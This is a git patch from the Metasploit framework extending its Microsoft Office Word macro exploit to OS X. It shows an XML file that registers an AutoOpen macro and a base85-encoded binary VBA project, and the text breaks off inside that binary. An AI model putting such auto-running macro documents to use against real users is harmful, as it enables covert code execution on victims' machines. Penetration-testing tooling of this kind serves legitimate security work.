From 3d269b46ad444633d89c110b0d63baa9893fcc65 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Thu, 16 Feb 2017 12:28:11 -0600
Subject: [PATCH] Support OS X for Microsoft Office macro exploit

---
 .../office_word_macro/word/vbaData.xml        |   2 +-
 .../office_word_macro/word/vbaProject.bin     | Bin 17920 -> 23040 bytes
 .../exploits/office_word_macro/macro.vba      |  42 ++++++++++--------
 .../windows/fileformat/office_word_macro.rb   |  25 ++++++++---
 4 files changed, 43 insertions(+), 26 deletions(-)
 mode change 100644 => 100755 data/exploits/office_word_macro/word/vbaData.xml
 mode change 100644 => 100755 data/exploits/office_word_macro/word/vbaProject.bin

diff --git a/data/exploits/office_word_macro/word/vbaData.xml b/data/exploits/office_word_macro/word/vbaData.xml
old mode 100644
new mode 100755
index 31ba994856..fd613d4fa0
--- a/data/exploits/office_word_macro/word/vbaData.xml
+++ b/data/exploits/office_word_macro/word/vbaData.xml
@@ -1,2 +1,2 @@
 <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
-<wne:vbaSuppData xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 wp14"><wne:mcds><wne:mcd wne:macroName="PROJECT.NEWMACROS.AUTOOPEN" wne:name="Project.NewMacros.AutoOpen" wne:bEncrypt="00" wne:cmg="56"/></wne:mcds></wne:vbaSuppData>
\ No newline at end of file
+<wne:vbaSuppData xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se wp14"><wne:mcds><wne:mcd wne:macroName="PROJECT.NEWMACROS.AUTOOPEN" wne:name="Project.NewMacros.AutoOpen" wne:bEncrypt="00" wne:cmg="56"/></wne:mcds></wne:vbaSuppData>
\ No newline at end of file
diff --git a/data/exploits/office_word_macro/word/vbaProject.bin b/data/exploits/office_word_macro/word/vbaProject.bin
old mode 100644
new mode 100755
index 36867c5fec17a88b59711219154f3768d0ee6e92..bd1940cf579b96459a0a236ae187302dbe6f0185
GIT binary patch
literal 23040
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
